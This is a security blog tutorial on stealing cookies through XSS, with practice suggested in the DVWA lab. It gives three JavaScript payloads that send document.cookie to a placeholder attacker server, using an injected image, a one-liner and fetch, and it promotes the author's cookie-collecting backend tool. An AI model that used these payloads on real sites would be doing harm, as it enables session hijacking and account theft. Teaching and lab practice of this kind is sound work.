top of page
  • Marco Liberale

Understanding and Simulating XSS Cookie Stealing in a Controlled Environment


As a security enthusiast, I'm always exploring different vulnerabilities and their potential implications. Cross-Site Scripting (XSS) is one such vulnerability that fascinates me, particularly due to its ability to enable cookie stealing.

In this blog post, I'll discuss how XSS can be used to hijack cookies and provide some examples that you can try in a safe and controlled environment. For practicing these techniques, I recommend using the Damn Vulnerable Web Application (DVWA), an intentionally vulnerable web application that's perfect for security testing.

Disclaimer: The information provided here is for educational purposes only. Always ensure you have permission before testing any security exploits and use them responsibly.

What is XSS?

Cross-Site Scripting (XSS) is a security weakness that allows attackers to inject malicious scripts into otherwise benign and trusted websites. It is one of the most prevalent vulnerabilities out there and can lead to a variety of attacks, including session hijacking and malicious redirections.

The Importance of Cookies

Cookies play a vital role in the web ecosystem. They are used for managing user sessions, storing user preferences, and providing personalized content. Due to the sensitive nature of the data they often store, cookies are an attractive target for cyber attackers.

Theoretical Background

XSS cookie stealing exploits a vulnerable web application by sending the user's cookies to an attacker's server. There are several ways to accomplish this, but here I'll focus on image-based techniques.

Practical Examples: Image-Based XSS Attacks

Before diving into the code examples, I highly recommend downloading my backend tool designed for cookie stealing. It's available on my GitHub repository and can be a valuable asset for your testing. This tool will help you simulate and understand cookie stealing in a practical scenario. You can find and download the tool at: Use this tool in conjunction with the following examples to enhance your learning experience.

Methodical Approach

Here's a JavaScript snippet that demonstrates the process:

function sendCookies() {
  var img = document.createElement('img');
  img.src = 'http://[IP]?[VAR]=' + encodeURIComponent(document.cookie);
window.onload = sendCookies;

Upon loading the webpage, this script creates a new image element with the src attribute pointing to the attacker's server (replace [IP] with the server's IP address). The cookies are sent as part of the image request's query string.

Concise Method

If you prefer a more compact script:

document.body.appendChild(document.createElement('img')).src='http://[IP]?[VAR]=' + encodeURIComponent(document.cookie);

This one-liner creates an image element, sets the src, and attaches it to the document. Although no image is displayed, the cookies are still sent to the specified server.

Fetch-Based Non-Rendering Approach

For an even subtler method:

fetch('http://[IP]?[VAR]=' + document.cookie)

This uses the fetch API to send the cookies without any DOM manipulation.

Testing with DVWA

To safely test these XSS techniques, I suggest using DVWA. It's a great way to learn about web security in a controlled setting. Here's how to get started:

  1. Download and set up DVWA on your local web server environment.

  2. Explore and enable different security levels to test your scripts.

  3. Try out the provided XSS examples and observe how they work.

You can download DVWA here

Remember, replace [IP] with your server's IP and [VAR] with the appropriate variable name for the query string.


Exploring XSS and cookie stealing within a safe environment like DVWA can be a valuable learning experience. It's critical to understand these vulnerabilities to better protect against them.

Stay ethical and always have permission when testing out security tools and exploits. Check out my GitHub repository for the scripts and tools discussed in this blog.

Happy hacking!


Recent Posts

See All


Couldn’t Load Comments
It looks like there was a technical problem. Try reconnecting or refreshing the page.
bottom of page